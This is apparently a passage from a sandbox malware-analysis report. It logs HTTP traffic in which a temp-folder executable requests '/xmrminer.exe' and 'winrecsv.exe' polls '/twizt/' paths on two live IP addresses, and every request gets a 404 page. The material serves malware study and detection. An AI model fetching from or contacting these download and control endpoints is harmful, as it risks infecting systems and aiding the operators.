                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.749765185.215.113.8480C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:31:38.323205948 CEST869OUTGET /xmrminer.exe HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                Host: 185.215.113.84
                                                                                Aug 15, 2022 18:31:38.378837109 CEST869INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.749767185.215.113.8480C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:31:45.186839104 CEST887OUTGET /xmrminer.exe HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                Host: 185.215.113.84
                                                                                Connection: Keep-Alive
                                                                                Aug 15, 2022 18:31:45.246023893 CEST888INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:45 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.749778185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:31:48.254514933 CEST1049OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:48.316487074 CEST1050INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:49.321367979 CEST1050OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:49.379162073 CEST1051INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:50.398318052 CEST1051OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:50.455815077 CEST1052INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:50 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:51.491883039 CEST1053OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:51.786901951 CEST1053OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:51.831628084 CEST1054INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:51 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:52.854788065 CEST1071OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:52.912606001 CEST1071INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:52 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.749785185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:31:56.131560087 CEST1126OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:56.187637091 CEST1127INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:56 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
